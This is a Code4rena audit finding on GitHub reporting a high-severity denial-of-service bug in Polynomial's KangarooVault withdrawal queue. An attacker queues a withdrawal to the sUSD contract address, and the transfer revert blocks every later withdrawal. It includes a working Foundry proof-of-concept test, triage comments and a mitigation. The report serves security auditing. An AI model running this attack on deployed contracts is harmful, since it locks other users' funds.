code-423n4 / 2023-03-polynomial-findings

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KangarooVault QueuedWithdraw Denial of Service #105

Open code423n4 opened 1 year ago

code423n4 commented 1 year ago

Lines of code

Vulnerability details


When the KangarooVault has an open position, any withdrawals that are initiated, are queued.

QueuedWithdrawals work in two steps.

  1. A user initialtes the Withdrawal via initiateWithdrawal. This burns the VaultToken and if (positionData.positionId != 0) adds the request to the withdrawalQueue.
  2. processWithdrawalQueue() can be called to process requests in the withdrawalQueue that have passed minWithdrawDelay to transfer the SUSD tokens to the user.

If the processing of a QueuedWithdraw entry in the withdrawalQueue reverts, the queuedWithdrawalHead will never increase and further processing of the queue will be impossible. This means that any users that have placed a QueuedWithdraw after the reverting entry will have lost their vaultToken without receiving their SUSD.

Proof of Concept

When calling the initiateWithdrawal() function, the user can provide an address of the receiver of funds. When processing the withdrawal queue, the contracts does all the required checks, and then transfers the SUSD to the provided user.

If we look at the Synthetix sUSD token and it's target implementation we will find that the SUSD token transfer code is:

sUSD MultiCollateralSynth:L723-L739

function _internalTransfer(
    address from,
    address to,
    uint value
) internal returns (bool) {
    /* Disallow transfers to irretrievable-addresses. */
    require(to != address(0) && to != address(this) && to != address(proxy), "Cannot transfer to this address");

    // Insufficient balance will be handled by the safe subtraction.
    tokenState.setBalanceOf(from, tokenState.balanceOf(from).sub(value));
    tokenState.setBalanceOf(to, tokenState.balanceOf(to).add(value));

    // Emit a standard ERC20 transfer event
    emitTransfer(from, to, value);

    return true;

This means any SUSD transfer to the SUSD proxy or implementation contract, will result in a revert. An attacker can use this to make a initiateWithdrawal() request with user=sUSDproxy or user=sUSD_MultiCollateralSynth. Any user that request a Withdrawal via initiateWithdrawal() after this, will lose their vault tokens without receiving their SUSD. The attacker can do this at any time, or by frontrunning a specific (large) initiateWithdrawal() request.

To test it, a check is added to the mock contract that is used for SUSD in the test scripts:

diff --git a/src/test-helpers/MockERC20Fail.sol b/src/test-helpers/MockERC20Fail.sol
index e987f04..1ce10ec 100644
--- a/src/test-helpers/MockERC20Fail.sol
+++ b/src/test-helpers/MockERC20Fail.sol
@@ -18,6 +18,9 @@ contract MockERC20Fail is MockERC20 {

     function transfer(address receiver, uint256 amount) public override returns (bool) {
+        require(receiver != address(0xDfA2d3a0d32F870D87f8A0d7AA6b9CdEB7bc5AdB) , "Cannot transfer to this address");
         if (forceFail) {
             return false;

In the KangarooVault.t.sol test script, the following test was added to demonstrated the issue:

// add to top of file:
import {IVaultToken} from "../../src/interfaces/IVaultToken.sol";

// add to KangarooTest Contract:
    function testWithdrawalDOS() public {

        IVaultToken vault_token = kangaroo.VAULT_TOKEN();
        // make deposit for user_2, 2e23);
        susd.approve(address(kangaroo), 2e23);
        kangaroo.initiateDeposit(user_2, 2e23);

        // have vault open a position to force queued wthdrawals

        // vault has  position opened, withdrawal will be queued, vault_token burned, no USDC received
        kangaroo.initiateWithdrawal(user_2, 1e23);

        // process withdrawalqueue, withdrawam should pass
        uint256 user_2_balance = susd.balanceOf(user_2);

        // user 3 frontruns with fake/reverting withdrawal request.
        // to 0xDfA2d3a0d32F870D87f8A0d7AA6b9CdEB7bc5AdB (= SUSD MultiCollateralSynth contract address). 
        // This will cause SUSD transfer to revert.
        kangaroo.initiateWithdrawal(0xDfA2d3a0d32F870D87f8A0d7AA6b9CdEB7bc5AdB, 0);

        // user_2 adds another withdrawal request, after the attackers request, vault_token burned, no USDC received
        kangaroo.initiateWithdrawal(user_2, 1e23);

        // processWithdrawalQueue now reverts and no funds received


Tools Used

Manual review, forge

Recommended Mitigation Steps

The processing of withdrawalQueue should have a mechanism to handle reverting QueuedWithdraw entries. Either by skipping them and/or moving them to another failedWithdrawals queue.

JustDravee commented 1 year ago

Similar but different from

Somehow the import should be import {IVaultToken} from "../src/interfaces/IVaultToken.sol"; (one step less), but the POC runs correctly after that.

c4-judge commented 1 year ago

JustDravee marked the issue as satisfactory

c4-judge commented 1 year ago

JustDravee changed the severity to 2 (Med Risk)

c4-sponsor commented 1 year ago

mubaris marked the issue as sponsor confirmed

c4-judge commented 1 year ago

JustDravee marked the issue as selected for report

c4-judge commented 1 year ago

JustDravee changed the severity to 3 (High Risk)